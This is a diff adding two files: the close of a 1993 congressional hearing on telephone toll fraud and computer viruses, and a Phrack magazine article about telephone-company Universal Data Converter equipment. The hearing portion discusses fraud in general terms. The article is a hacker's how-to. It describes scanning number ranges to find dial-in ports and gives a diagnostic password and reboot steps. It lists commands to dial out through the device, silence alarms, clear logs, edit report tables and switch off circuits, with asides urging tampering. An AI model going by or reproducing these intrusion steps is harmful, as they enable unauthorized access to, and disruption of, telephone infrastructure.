+     Mr. MARKEY. Please.
+     Mr. FIELDS. Explain to me the franchise.
+     Mr. GUIDRY. What happens is, let's pretend we are in Los
+Angeles right now and I have the ability to clone a phone that is
+using a computer, a cattail, we call it, that goes from the
+computer, the back of the computer, into the telephone, and I have
+the diskette that tells me how to change that program. I can at
+some point sell the cloning. You can come to me, and I can clone
+your phone.
+     However, that is one way for me to make money. The best way
+for me to make money is to buy computers, additional diskettes, and
+go to Radio Shack or some place and make additional cattails and
+say, "I can either clone your phone for $1,500, or what you can do
+for $5,000 is start your own company." So you say, "Well, wow,
+that's pretty good, because how many times would I have to sell one
+phone at from $500 to $1,500 to get my initial investment back?" As
+a result now, you have groups, you have just youngsters as well as
+organized crime stepping in.
+     The Guidry Group has worked in the Philippines on this, we
+have worked in Mexico, the Dominican Republic, Chile, Argentina,
+and next week I will be in London and in Rome. It is so bad, sir,
+that now intelligence agencies in Rome have told me -- and that is
+what I am going there for -- that organized crime seems to think
+that telecommunications fraud is more lucrative, unfortunately,
+than drugs, and it is darned sure more lucrative in the Los
+Angeles, probably New York, and Miami areas, because right now
+prosecution is not that strong. It is unfortunate that all of law
+enforcement is not trained, nor could they be, to pick up on
+someone standing on a corner using an illegitimate phone.
+     Mr. FIELDS. How would a person know where to get their
+telephone cloned?
+     Mr. GUIDRY. Let me tell you what happens. Normally when we go
+into a major metropolitan city, or we also check the computer
+bulletin boards, a lot of times that information is there. Most of
+the time, though, it is in magazines, like green sheets, which are
+free advertisements saying, "Call anywhere in the world. Come to --"
+a location, or, "Call this number." Also in Los Angeles, for some
+reason, they seem to advertise a lot in sex magazines, and people
+will simply buy a sex magazine and there will be a statement in
+there, "Earn money the fast way. Start your own telecommunications
+company." And then we will follow up on that tip and work with the
+Secret Service to try to apprehend those people.
+     Mr. FIELDS. Mr. Haugh.
+     Mr. HAUGH. If I could just add a few comments, it would be
+most unfortunate if this denigrates into a discussion of
+adolescents who are curious and so-called finger hackers. The truth
+of the matter is that the toll fraudsters are adults, they are
+organized, they are smart, they are savvy, and the drug dealers in
+particular are learning very quickly that it is far more lucrative,
+far less dangerous, to go into the telecom crime business.
+     "Finger hacking" is a term, but the truth is, war dialers,
+speed dialers, modems, automated equipment now will hack and crack
+into systems and break the codes overnight. While the criminal
+sleeps, his equipment penetrates those systems. He gets up in the
+morning, and he has got a print sheet of new numbers that his
+equipment penetrated overnight.
+     We have interviewed the criminals involved. These so-called
+idle curiosity adolescents are being paid up to $10,000 a month for
+new codes. I don't call that curiosity, I call that venality. We
+are talking a $4 billion problem.
+     The chairman came up with the Maple Street example. I think
+even better yet, Mr. Chairman, the truth is that 216 Maple had a
+security device on the door and a code, and what Mr. Goldstein and
+his ilk do is sell that code through selling subscriptions to these
+periodicals. There is a big difference, in my opinion, between
+saying, "216 Maple is open" -- that is bad enough -- than to say,
+"You go to 216 Maple, and push 4156, and you can get in the door."
+     But we are talking about crime, we are talking about adults,
+we are talking about organized crime, perhaps not in the Cosa
+Nostra sense, but even the Cosa Nostra is wising up that they can
+finance some of these operations, and in New York and Los Angeles,
+in particular, the true Mafia is now beginning to finance some of
+these telecom fraud operations.
+     Mr. FIELDS. Mr. Guidry, one last question. Is it the Secret
+Service that is at the forefront of Federal activity?
+     Mr. GUIDRY. Yes, sir, it is.
+     Mr. FIELDS. Do they have the resources to adequately deal with
+this problem?
+     Mr. GUIDRY. No, sir. The problem is growing so rapidly that
+they are undermanned in this area but have asked for additional
+manpower.
+     Mr. FIELDS. Is this a priority for the Secret Service?
+     Mr. GUIDRY. Yes, sir, it is.
+     Mr. FIELDS. Thank you, Mr Chairman.
+     Mr. MARKEY. The gentleman's time has expired.
+     Again, it is a $4 to $5 billion problem.
+     Mr. HAUGH. That is what our research indicated.
+     Mr. MARKEY. There were 35,000 victims last year alone.
+     Mr. HAUGH. Yes, sir, and this is only users, large users. Now
+it can be businesses, nonprofits. There is a university on the East
+Coast that just this last week got hit for $490,000, and the fraud
+is continuing.
+     Mr. MARKEY. The gentleman from Ohio.
+     Mr. OXLEY. Thank you, Mr. Chairman.
+     Let me ask the witnesses: Other than making the penalties
+tougher for this type of activity, what other recommendations, if
+any, would any of you have that we could deal with, that our
+subcommittee should look at, and the Judiciary Committee, I assume,
+for what we might want to try to accomplish?
+     Mr. Haugh?
+     Mr. HAUGH. I happen to disagree with a couple of the witnesses
+who have indicated tougher penalties. I mean it sounds great. You
+know, that is the common instant reaction to anything, expand the
+penalties. I happen to think 20 years is plenty enough for criminal
+penetration of a telecom system, and there are a few housekeeping
+things that could be done.
+     The problem isn't the adequacy of the law, the laws are pretty
+adequate, and, as Mr. Delaney indicated, you have a violation
+someplace, you have got a State law and a Federal law, both, and if
+you are a smart prosecutor, there are about eight different ways
+you can go after these criminals.
+     The truth is, we have got inadequate enforcement, inadequate
+funding, inadequate pressure on the part of the Congress on the FCC
+to make more proactive efforts and to put more heat on the industry
+to coordinate.
+     The truth is that the carriers compete with each other
+fiercely. They, with some limited exceptions, don't share
+appropriate information with each other. The LEC's and the RBOC's
+hide behind privacy; they hide behind other excuses not to
+cooperate with law enforcement and with the rest of the industry as
+effectively as they should.
+     So I think putting the heat on the industry, putting the heat
+on the FCC, more adequately funding the FCC, more adequately
+funding the Secret Service, and having hearings like this that
+focus on the problem is the answer and not expanding the penalty
+from 20 years to 25 years. Nobody gets 20 years anyway, so
+expanding the 20 years is, to me, not the answer.
+     Mr. OXLEY. What is the average sentence for something like
+that?
+     Mr. HAUGH. I think the average toll fraud criminal who
+actually goes to jail -- and they are few and far between -- spends
+3 to 6 months, and they are out.
+     Now recidivism levels are low, I agree with Mr. Delaney. Once
+you catch them, they rarely go back to it. So it isn't a question
+of putting them in jail forever, it is a question of putting them
+in jail. The certainty of punishment level is very low.
+     We talked to a drug dealer in New York City who left the drug
+business to go into toll fraud because he told me he can make
+$900,000 a year -- nontaxable income, he called it -- and never
+ever worry about going to jail.
+     Mr. DELANEY. In New York City, I have never seen anybody go to
+jail on a first offense for anything short of armed robbery, let
+alone telephone fraud. They typically get 200 hours of community
+service, depending upon the judge.
+     These people that I am speaking about are not the computer
+hackers that we were speaking about earlier, these are the people
+that are the finger hackers that break into the PBX's around the
+country. These are immigrants in the United States, they are
+adults, they know how to operate a telephone. They sit there
+generally -- almost every one that we have arrested so far uses a
+Panasonic memory telephone, and they sit there night and day try
+ing to hack out the PBX codes. They go through all the default
+codes of the major manufacturers of PBX's. They know that much.
+     We don't have a single person in New York City, that I know
+of, that is hacking PBX's with a computer. The long distance
+carriers can see patterns of hacking into 800 lines, which are
+typically the PBX's, and they can see that it is being done by
+telephone, by finger hacking a telephone key pad, as opposed to a
+computer.
+     The war dialing programs that Mr. Haugh referred to are
+typically used by the computer hackers to get these codes, but they
+create only a minuscule amount of the fraud that is ongoing in the
+country. The great majority is generated by the finger hackers who
+then disseminate those codes to the telephone booths and the call
+selling operations that operate out of apartments in New York City.
+In one apartment with five telephones in it that operates 16 hours
+a day for 365 days a year selling telephone service at $10 for 20
+minutes, you take in $985,000. It is a very profitable business.
+     One of the individuals we arrested that said he did this
+because it was more profitable and less likely that he be caught
+than in selling drugs was murdered several months after we arrested
+him in the Colombian section of Queens because he was operating as
+an independent. It is a very controlled situation in New York City,
+and different ethnicities throughout New York City control the call
+sell operations in their neighborhoods, and everyone in those
+neighborhoods knows where they can go to make an illicit phone call
+or to get a phone cloned, whether it is a reprogrammed phone or
+rechipped.
+     Mr. OXLEY. Mr. Guidry, did you have a comment?
+     Mr. GUIDRY. Well, I think that we really do need to enforce
+the laws and we need to make some statutory changes in title 18,
+section 1029 to include cellular and wireless.
+     I have been in courtrooms where really savvy defense attorneys
+say, "Well, it does not specifically indicate cellular or
+wireless," and that raises some question in the jury's mind, and I
+would just as soon that question not be there.
+     Mr. OXLEY. Thank you.
+     Mr. Chairman, I see we have got a vote, and I yield back the
+balance of my time.
+     Mr. MARKEY. Thank you.
+     We are going to have each one of you make a very brief summary
+statement to the committee if you could, and then we are going to
+adjourn the hearing.
+     As you know, the Federal Communications Commission will be
+testifying before this subcommittee next week. We have a great
+concern that, although they held an all-day hearing on toll fraud
+last October, while we thought they were going to move ahead in an
+expeditious fashion, that, with a lot of good information, it has
+all sat on the shelf since that time. We expected them to act on
+that information to establish new rules protecting consumers and
+pushing carriers to do a lot more than they have done thus far to
+protect their networks. In light of recent court decisions holding
+that consumers are always liable I think that action by the FCC is
+long overdue, and at the FCC authorization hearing next week I
+expect to explore this issue with the commissioners in depth, so
+you can be sure of that, Mr. Haugh.
+     Let's give each of you a 1-minute summation. Again, we will go
+in reverse order and begin with you, Mr. Guidry.
+     Mr. GUIDRY. Thank you, sir.
+     Telecommunications fraud, of course, is going internationally,
+and as it goes internationally and starts to franchise and get more
+organized, we are going to have to figure out a better way to
+combat it. Industry itself right now is putting its best foot
+forward. However, I would ask this committee to strongly look at
+changing some of this legislation and to also increase law
+enforcement's efforts through manpower.
+     Thank you very much, sir.
+     Mr. MARKEY. Thank you.
+     Mr. Haugh.
+     Mr. HAUGH. I agree with Mr. Guidry that there are some
+housekeeping changes that need to be made, and the particular title
+and section he referred to should definitely be amended to include
+more clearly wireless.
+     The overall problem is an immense one; it is a very serious
+one; it is a complicated one. Everybody is at fault. Finger
+pointing has been carried to an extreme. Again, I think the long
+distance carriers, the big three -- AT&T, MCI, and Sprint -- have
+done a superb job of coming up to speed with monitoring. They are
+starting to cooperate better. They have really come to the table.
+     The laggards are the LEC's and the RBOC's, the CPE
+manufacturers, and the FCC. In fairness to the FCC, they are
+understaffed, undermanned, underfunded. They can't even take care
+of all their mandated responsibilities right now, let alone take on
+new chores.
+     All that said, there is a great deal the FCC can do --
+jawboning, regulations, pushing the LEC's and the RBOC's, in
+particular, to get real, get serious -- and I would urge this
+committee -- applaud your efforts and urge you to continue that.
+     Mr. MARKEY. Thank you.
+     Dr. Tippett.
+     Mr. TIPPETT. Thank you.
+     The computer virus issue is a little bit different than the
+toll fraud issue. In fact, there are no significant laws that deal
+with viruses, and, in fact, the fact that there are no laws gives
+the people who write viruses license to write them. The typical
+statement you read is, "It's not illegal, and I don't do anything
+that is illegal." So in the computer virus arena we do need laws.
+They don't need to be fancy; they don't need to be extensive. There
+are some suggestions of approaches to virus legislation in my
+written testimony.
+     We also need education, and I would encourage Congress to
+underwrite some education efforts that the private sector could
+perform in various ways, perhaps through tax incentives or tax
+credits. The problem is growing and large. It exceeds $1 billion
+already in the United States, and it is going to be a $2 billion
+problem in 1994.
+     As bad as toll fraud seems, this virus issue is, oddly, more
+pervasive and less interesting to a whole lot of people, and I
+think it needs some higher attention.
+     Mr. MARKEY. Thank you.
+     Mr. Goldstein.
+     Mr. GOLDSTEIN. Thank you.
+     I would like to close by cautioning the subcommittee and all
+of us not to mix up these two very distinct worlds we are talking
+about, the world of the criminal and the world of the experimenter,
+the person that is seeking to learn. To do so will be to create a
+society where people are afraid to experiment and try variations on
+a theme because they might be committing some kind of a crime, and
+at the same time further legislation could have the effect of not
+really doing much for drug dealers and gangsters, who are doing far
+more serious crimes than making free phone calls, and it is not
+likely to intimidate them very much.
+     I think the answer is for all of us to understand specifically
+what the weaknesses in the technology are and to figure out ways to
+keep it as strong and fortress-like as possible. I do think it is
+possible with as much research as we can put into it.
+     Thank you.
+     Mr. MARKEY. Thank you, Mr. Goldstein.
+     Mr. Delaney.
+     Mr. DELANEY. Last year, the Secret Service and the FBI
+arrested people in New York City for conducting illegal wiretaps.
+The ability to still do that by a hacker exists in the United
+States. Concerned with privacy, I am very happy to see that
+something like the Clipper chip is going to become available to
+protect society. I do hope, though, that we will always have for
+the necessary law enforcement investigation the ability to conduct
+those wiretaps. Without it, I see chaos.
+     But with respect to the cellular losses, the industry is
+coming along a very rapid rate with technology to save them money
+in the future, because with encryption nobody will be able to steal
+their signals either.
+     Mr. MARKEY. Thank you, Mr. Delaney.
+     I apologize. There is a roll call on the Floor, and I only
+have 3 minutes to get over there to make it. You have all been very
+helpful to us here today. It is a very tough balancing act, but we
+are going to be moving aggressively in this area. And we are going
+to need all of you to stay close to us so that we pass legislation
+that makes sense.
+     This hearing is adjourned. Thank you.
+     [Whereupon, at 12:16 p.m., the subcommittee was adjourned.]
+
diff --git a/phrack45/21.txt b/phrack45/21.txt
new file mode 100644
index 0000000..8d2b2f0
--- /dev/null
+++ b/phrack45/21.txt
@@ -0,0 +1,1291 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 21 of 28
+
+****************************************************************************
+
+                        The Universal Data Converter
+                        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                           Written by:  Maldoror
+                     ~~~ChUrcH oF ThE nOnConFOrMisT~~~
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                     -=[     DELAMO LABS INC       ]=-
+                       """""""""""""""""""""""""""""
+
+What IS a UDC?!
+"""""""""""""""
+
+The Universal Data converter (UDC), by Applied Computing Devices,
+was put into widespread use in 1979.  A UDC is used primarily in
+connection with a variety of switches, to log everything the switch does,
+and report it to the Central Office in a standard format, allowing the
+monitoring and reporting of a variety of different switches by one processor
+without the need of understanding each individual switch. This lets the
+Telco-Trouble shooters monitor exactly how much traffic is passing
+thru a given switch.  Exact number of calls, busys & fraud attempts, are
+some examples.  A UDC will give detailed reports of such activity, as
+well as hold it in a buffer file which you can view for your own excitement.
+The real purpose of this piece of hardware is to buffer data, convert it
+to a standard format, and send it on it's merry way to the Central Processor.
+Information may be buffered for up to an hour, before being able to be
+received by the Central Processor.
+
+Which Switches use a UDC?
+"""""""""""""""""""""""""
+
+Well, apparently, nearly all switches owned by a tel-co use a UDC
+for their daily reports.  Here is a list of the switches of which I know
+may be connected to a converter:
+
+
+       At&t Autoplex 100
+       ITT/North 1210
+       ITT/North NX-1E
+       ITT/North "1200" Series (DSS-1)
+       GTE GTD-1 (Automatic Electric no. 1 EAX)
+       GTE GTD-2 (Automatic Electric no. 2 EAX)
+       GTE GTD-3 (Automatic Electric no. 3 EAX)
+       GTE GTD-5
+       Motorola EMX-250
+       NEC NEAX-61
+       NEC ND-20S
+       Northern Telecom DMS-10
+       Northern Telecom DMS-100
+       Northern Telecom DMS-200
+       Northern Telecom DMS-250
+       Northern Telecom DMS-300
+       Northern Telecom SL-1  (Seen these around locally)
+       Northern Telecom SP-1 PABX
+       Stromberg Carlson DCO
+       TRW Vidar ITS-4
+       TRW Vidar ITS-4/5
+       TRW Vidar ITS-5
+       Western Electric 5 ESS
+       GTE PBX's (GTD-1000, GTD-4600)
+
+
+
+General Configurations:
+"""""""""""""""""""""""
+
+A UDC may be configured in several ways.  A UDC consists of up to 6 ports.
+Port 0 is usually a dialin line, in which it is connected to a 300/1200
+baud modem, so that GTE employees may call to check their switch
+information in the field.
+
+Port 0 may also be a dedicated line, which is linked to a computer somewhere
+important, but if this is the case, you can't have found it anyways, so don't
+worry about it. (Unless of course you another indial port possibly 1)
+
+Port 2 is usually the line which is hardwired to the data output of the
+switch.  This port receives the messages of a switch, analyses the data,
+buffers it, and waits until it is told to send the data to the CP, which
+may be every time the buffer flips, which of course is configured by hardware.
+It is not required that port 2 be the hardwire, although it is just the
+most common configuration.
+
+Port 1 & 3-7 are also multi-use ports , which may be configured
+either for a dedicated line, or a standard phone line, just like port 1.
+The difference between this port and port 0 however, is that this port may
+also be used to test lines other than the hardware set report line #.
+(More later.)
+
+NOTE:  ANY of these ports can be completely different depending on the
+       setup of the UDC's cards, and which slot they are in...
+
+
+The UDC can be configured (though I have never seen it this way) so that any
+of the six ports can preform the functions instead of the first three.
+If you find a UDC, be sure to check all the ports, and not just three.
+
+The general idea of this box of tin is that it will monitor any
+switch, collect data into a buffer, and store it until it need be
+converted and polled by the SAC.  When the data is sent out, it is sent
+in standard UDC format, regardless of the type of switch, therefore any
+switch may be monitored by the SAC without having to be converted on
+the spot.
+
+Yeah Great what the ?#!$ do I do?
+""""""""""""""""""""""""""""""""'
+
+Scan your local area for all numbers ending in 99xx or 00xx, often
+(with GTE anyways) the prefix may be something like 446-9988, or something
+outright obvious.  Once you find one, you will know, because you will
+get one of two things.  Depending on the configuration of the UDC,
+you will either begin getting a dump of data, which will go into detail
+about the switch information, or you will get a prompt:
+
+*B*>
+
+When you receive this prompt, you can make your life easy by typing
+HELP in all caps, for a menu of commands, which will seem important at
+first (don't fool yourself).
+
+Each letter between *'s represents a separate processor (yes even this tin
+box has more than one!  These letters will be in the menu
+when you type HELP.  To change processors, you will need to hold control
+while pressing the letter of the processor you wish to change to.
+
+Here is a list of commands for each processor:
+
+                        The Basic processor
+                        ~~~~~~~~~~~~~~~~~~~
+
+*B*> DATE               Display the system Date
+
+*B*> DATE mm/dd/yy      Set the date to mm/dd/yy
+
+*B*> DIAGNOSTIC         This puts you in debug mode for the UDC's program
+                        When typing this command the UDC will respond with
+                        "PASSWORD" and will not echo letters.  If the password
+                        given is correct, you will get a prompt like this:
+                        *B*> DIAG
+                        PASSWORD 305      > I enter the good password<
+                        DEBUG 1,3         > 1,3 are the ports in use <
+                        ?
+                        At this point you can reboot the UDC by typing:
+                        ? G
+                        (ADDR)=1000       > I tell it to jmp to 1000 <
+                        Then all hell will break loose...trust me!
+                        O.k. well it will look like it anyway...
+
+
+*B*> HELP               Duh um, a Menu
+
+*B*> RAMPAGE            Test traffic data storage area
+
+*B*> SYSTEM             Display system checksums
+
+*B*> TIME               Display system time
+
+*B*> TIME hh:mm:ss      Set system time (confuse them, set it back then forwd)
+
+
+                        The Patch Processor
+                        ~~~~~~~~~~~~~~~~~~~
+
+*P*> ANSWER n           Take channel 'n' off hook (neato)
+
+*P*> BAUD c,bbbb,nnn    Set Channel 'c' Baud rate to 'bbbb', and
+                        number of nulls to 'nnn'
+*P*> HANGUP n           Put channel 'n' on hook (log out too)
+
+*P*> HELP               Help Menus
+
+*P*> PATCH n            Patch calling port to port 'n' (Dial out!)
+                        It IS possible to patch to modem ports, but I don't
+                        recommend it...all GTE numbers have their own COS.
+                        (Easy to find you)
+
+                        The Plant Queue Processor
+                        ~~~~~~~~~~~~~~~~~~~~~~~~~
+
+*Q*> ALARM              Display the alarm (error message) string
+
+*Q*> ALARM xx..xxx      Set Alarm String (change it back if u want)
+
+*Q*> CLEAR              Clear buffer without printing contents (not preferred)
+
+*Q*> DUMP               Print and clear contents (destructive, not preferred)
+
+*Q*> HELP               Help Menu
+
+*Q*> LIMITS             Display buffer alarm threshold
+
+*Q*> LIMITS nnnnn       Set buffer alarm threshold to 'nnnn'
+
+*Q*> LIST               Display buffer contents (Better than dump)(ok!)
+
+*Q*> LIST nnnn          Display buffer contents from 'nnnn' to end
+
+
+                        The Report Processor
+                        ~~~~~~~~~~~~~~~~~~~~
+
+*R*> BACKUP             Transfer a copy of the ROM based table to the
+                        editor workspace
+*R*> DEFAULT            Make the ROM based table effective (can crash)
+
+*R*> EDIT               Engage in edit mode
+
+        APPEND          Add line to RMT (Hi there Gen-Tel!)
+        DELETE          Delete line from RMT
+        END             End edit session
+        HELP            List Editor Commands
+        LIST            List RMT
+        MODIFY          Modify a line in RMT
+
+*R*> DOWNLOAD           Download RMT to PROM programmer (ha!)
+
+*R*> HELP               More menus
+
+*R*> LIST               List effective RMT
+
+*R*> LIST N             List RMT without Heading
+
+*R*> LIST nnnn          List line 'nnnn' of effective RMT
+
+*R*> LIST nnnnN         List line 'nnnn' of effective RMT without heading
+
+*R*> LIST nnnn,mmmm     List lines 'nnnn' to 'mmmm' of RMT
+
+*R*> LIST nnnn,mmmmN    List lines 'nnnn' to 'mmmm' of RMT without heaading
+
+*R*> NEW                Clear the editor workspace
+
+*R*> USER               Make RAM based RMT active
+
+
+                        The Scanner Processor
+                        ~~~~~~~~~~~~~~~~~~~~~
+
+*S*> CIRCUIT             Display Status Report
+
+*S*> CIRCUIT nnn OFF     Turn off circuit 'nnn' and print Status report
+
+*S*> CIRCUIT nnn OFF N   Turn off circuit 'nnn' without report
+
+*S*> CIRCUIT nnn,mmm OFF Turn off circuts 'nnn' to 'mmm'
+
+*S*> CIRCUIT nnn,mmm OFF N  Turn off 'nnn' to 'mmm' without report
+
+*S*> CIRCUIT nnn ON      Turn 'nnn' ON and print report
+
+*S*> CIRCUIT nnn ON N    Turn 'nnn' ON without report
+
+*S*> CIRCUIT nnn,mmm ON  Turn circuts 'nnn' to 'mmm' on and print status report
+
+*S*> CIRCUIT nnn,mmm,ON N   Turn on 'nnn' to 'mmm' but do not print report
+
+*S*> REPORT             Display names of disable reports
+
+*S*> REPORT report.type OFF     Disable 'report.type' for printing
+
+*S*> REPORT report.type ON      Enable  'report.type' for printing
+
+*S*> RESTART            Restart scanner interrogation
+
+*S*> ROUTE n            Display all future alarm reports on channel 'n'
+
+*S*> STOP               Stop scanner interrogation
+
+*S*> TEST               Dial the alarm number set on the system optioning
+                        board (dip switches on the config board) for
+                        communication line testing.
+
+*S*> TEST 3,1 nnn nnn nnnn    Dial the indicated number (on port 3) and test
+                              the communication lines.
+                              If you test with the port you called in on,
+                              you will have to hangup and call back for the
+                              results. (Port 0)
+
+                        The Traffic Processor
+                        ~~~~~~~~~~~~~~~~~~~~~
+
+*T*> ACTIVE             Display the contents of the active buffer
+
+*T*> BANK               Display bank to be polled
+
+*T*> BANK n             Set Bank to be polled (bank 'n')
+
+*T*> FLIP               Flip the buffers (this MAY cause polling, depending
+                        on the hardware (switch) & port configuration)
+*T*> HELP               Processor Menus
+
+*T*> METERS             Display current meter limits
+
+*T*> METERS nnnn        Set upper meter limits
+
+*T*> METERS mmmm,nnnn   Set lower and upper meter limits
+
+*T*> METERS mmmm,nnnn V Set variable meter limits
+
+*T*> METERS mmmm,nnnn F Set fixed meter limits
+
+*T*> PASSIVE            Display the contents of a Passive buffer
+
+*T*> TRAFFIC            Interrupt or resume traffic after user interaction
+                        with channel 1
+
+
+
+Standard Control Codes
+~~~~~~~~~~~~~~~~~~~~~
+
+^A      Start of Heading
+^B      Start of Text
+^C      End of Text
+^D      End of transmission
+^E      Enquiry (no not like CBI)
+^F      Acknowledgment
+^G      Bell :)
+^H      Backspace
+^I      Horizontal Tab
+^J      Line feed
+^K      Vertical Tab
+^L      Form Feed
+^M      Carriage return
+^N      Shift out
+^O      Shift in
+^P      Data line escape
+^Q      Device Control 1
+^R      Device Control 2
+^S      Device Control 3
+^T      Device Control 4
+^U      Negative Acknowledgment
+^V      Synchronous Idle
+^W      End of Transmission Block
+^X      Cancel
+^Y      End of Medium
+^Z      Substitute
+
+
+
+What is all this?
+~~~~~~~~~~~~~~~~
+
+The RMT data is the data transmitted to the UDC by the switch.  This data
+is formatted in such a way that it tells the UDC what is happening and what
+has already happened since the last buffer flip.  This data is then converted
+to a standard format to be transferred to the Central Processor.  For examples
+of switch output, refer to the switch example list further in this article.
+
+Here is an example of the System Output data, after being translated into
+standard format by the UDC:
+
+
+The first two lines of the System Output data will contain the values
+of the 19 status registers as follows:
+
+       0     1     2     3     4     5     6     7     8     9
+
+000  00345 00003 00013 00000 00005 00000 00005 01903 00012 00000
+001  06800 01021 01101 01065 00000 00003 00007 02435 00000 00000
+
+       10    11    12    13    14    15    16    17    18    19
+
+The registers are as follows:
+
+0       UDC control program number (usually 345, newer versions may be diff.)
+1       UDC control program version (1,3,5,etc.)
+2       Hour at buffer flip (active to passive)
+3       Minute at buffer flip (active to passive)
+4       Number of buffer flips since power on (65535 maximum)
+5       Power interrupt flag (99 if fewer than two intervals have occurred
+        since the power interrupt or hard restart; 0 otherwise)
+6       Number of reports in the buffer
+7       Total number of meters in this buffer (including headers)
+8       Hour at buffer flip (passive to active)
+9       Minute at buffer flip (passive to active)
+10-13   Strapping Card signature
+14      Total number of errors since last had reset or power up
+15      Number of soft restarts since last power-up or hard restart
+16      Number of buffer flips since last soft restart
+17      Address of last error which caused a soft restart
+18-19   unused
+
+
+When a traffic report is to be sent, the following header will be sent
+(in the System Output) to the UDC processor(s) to tell the traffic processor
+to begin buffering the report:
+
+       0     1     2     3     4     5     6     7     8     9
+
+190  65535 00008 00022 00000 00000 00000 00000 00000 00000 00000
+191  00004 00027 00078 00700 00800 31227 00074 00000 00002 00018
+192  00078 00000 00000 00000 00000 00000 00000 00000 00000 00000
+
+       10    11    12    13    14    15    16    17    18    19
+
+The registers for the header are as follows:
+
+0       65535 (This signals the beginning of the switch report)
+1       Message type obtained from the 'type' field of the RMT
+2       The number of registers used by the message, including the
+        10 registers of this header.
+3-9     unused (00000)
+
+
+
+Ok ?!  Now what?!
+~~~~~~~~~~~~~~~~~
+
+Well now that I have explained all the commands, the data formats, etc,
+of the UDC, you can now check the RMT or TRAFFIC buffers to see exactly
+what type of switch you are monitoring.  Here are some examples of the
+Data format for the following switches:
+
+************************************************************************
+-------------------  AT&T AUTOPLEX 100 SWITCH  -------------------------
+************************************************************************
+
+
+Example of RMT data:
+~~~~~~~~~~~~~~~~~~~
+
+
+ENTRY  REQUIRED   STRING        NEW     ACTION  TYPE    STARTING      ENDING
+        PHASE                   PHASE                   REGISTER      REGISTER
+------------------------------------------------------------------------------
+001     000     /M 00/          001     075     255     65535           65535
+002     001     /BLOCK C/       002     077     001     00020           00169
+003     002     /FINISH/        001     073     255     65535           65535
+004     001     /CELL 001/      001     077     002     00170           00229
+005     001     /CELL 002/      001     077     003     00230           00289
+006     001     /CELL 003/      001     077     004     00290           00349
+007     001     /CELL 005/      001     077     005     00350           00409
+008     001     /CELL 006/      001     077     006     00410           00469
+009     001     /CELL 007/      001     077     007     00470           00529
+010     001     /CELL 008/      001     077     008     00530           00589
+011     001     /CELL 009/      001     077     009     00590           00649
+012     001     /CELL 010/      001     077     010     00650           00709
+013     001     /CELL 011/      001     077     011     00710           00769
+014     001     /CELL 012/      001     077     012     00770           00829
+015     001     /CELL 013/      001     077     013     00830           00889
+016     001     /BLOCK H/       001     077     014     00890           00949
+017     001     /FINISH/        001     073     255     65535           65535
+
+
+Example of TRAFFIC report:
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+M 00    3/7/1993        THU     13:00:00
+        #068
+
+        A 30
+
+        BLOCK C 000034   13:00  3/7/1993        12:00   3/7/1993
+
+(0)
+000100 000313 000197 000049 000029 000103 000226 000125 000220 000066
+(1)
+000180 000291 000238 000123 000050 000154 000326 000146 000074 000089
+(2)
+000000 000007 000000 000000 000000 000000 000000 000000 000000 000000
+(3)
+000000 000000 000000 000000 000000 000000 000000 000036 000180 000000
+(4)
+000023 000023 000366 000000 000000 000000 000000 000000 000000 000000
+(5)
+.
+.
+.
+  (more data)
+
+.
+.
+(13)
+000000 000000 000000 000000 000000 000000 000000 000000 000000 000000
+        FINISH
+        03/07/93  13:30:38
+        #371
+        .
+        .
+        .
+
+M 00    3/7/1993 THU 13:00:00
+        #068
+
+
+00 REPT:AMPSTRSF        CELL 001  START 120    STOP 130     03/07   COMPLETE
+000089 000014 000000 000000 000000 000000 000084 000014 000201 000001
+000052 000050 000048 000036 000002 000008 000003 000199 000000 002654
+000000 000031 000000 000360 000000 000000 000000 000036 003728 005170
+000000 004065 003170 000000 003992 000071 000000 000067 000146 000000
+000241 000000 000000 000000 000000 000000 000000 000000 000000 000000
+#077
+
+        M 00 REPT:RC CENSUS
+                OFFICE RC CHANNEL = REM
+                TRCA OVER 0% FULL
+                RBA OVER 5% FULL
+                RCMDS   MODE = 0
+                #082
+
+
+        M 00 REPT:RC SOURCE
+
+        SCV=0
+        CFV=0
+        RCS=0
+        DLY=0
+        VSS=0
+        ACS=0
+        CSR=0
+        BIS=0
+        TRB=0
+        FBP=0
+        LOG=0
+        CR6=0
+        #083
+        .
+        .
+        .
+        (more)
+        .
+        .
+
+*************************************************************************
+---------------------   ITT/North 1210 Switch  --------------------------
+*************************************************************************
+
+
+
+Example of RMT data:
+~~~~~~~~~~~~~~~~~~~
+
+ACTION  IN LINE  003                    FIXED LOWER: 00000  UPPER: 02039
+
+ENTRY  REQUIRED STRING          NEW     ACTION  TYPE  STARTING  ENDING
+        PHASE                   PHASE                 REGISTER  REGISTER
+-------------------------------------------------------------------------------
+001     000     /:/             001     076     255     65535   65535
+002     001     /TYPE/          002     073     255     65535   65535
+003     002     /2  /           003     077     002     00020   00098
+004     002     /4  /           003     077     004     00100   00319
+005     002     /5  /           003     077     005     00320   00469
+006     002     /16 /           003     077     016     00670   01769
+007     002     /18 /           003     077     018     01770   02040
+008     002     /20 /           003     077     020     00470   00669
+009     003     /END/           000     073     255     65535   65535
+
+Example of a TRAFFIC report:
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+DSS-1  VAR-00 VER-00 PAT=43   ACD
+938 R TRAFF 4703 12/06/93       09:00:00 SBG-B
+                                DATA FROM 1210 SWITCH TO UDC
+
+DIAL TONE DELAY
+TYPE    CODE    SCAN(SEC)       BRP     START/TIME   LENGTH(MIN) ORDER/DATE
+  2      R          10          21(45)   08:00          60       12/16/93
+
+THRESHOLD TIME 2.0
+
+LSID    DTD  TIME(SEC)  CALLS   DELAY CALLS
+ 1              .34     60           1
+ 2              .47     34           0
+SYS TOTAL       .43     94           1
+END
+
+936 TRAFF  4703 12/06/93        09:45:55        SBG-B
+SEPERATIONS
+
+TYPE    CODE    SCAN(SEC) BRP   START/TIME      LENGTH(MIN)     ORDER/DATE
+  4      R      NONE     10(43Z 12:00            60             12/06/79
+
+CNTR*  VALUE  CNTR*  VALUE  CNTR*   VALUE CNTR*  VALUE  CNTR*  VALUE
+  1    32      2      65     3       73    4      84     5      64
+  6    42      7      84     8       51    9      63     10     69
+
+END
+
+9344  TRAFF 4703  12/06/93  09:46:00    CALL COUNT
+.
+.
+(more)
+.
+.
+
+        note: This thing is a beast! If you find one of these call
+                a museum quick!!!
+
+*************************************************************************
+---------------         ITT/North NX-1E Switch    -----------------------
+*************************************************************************
+
+
+
+RMT data example:
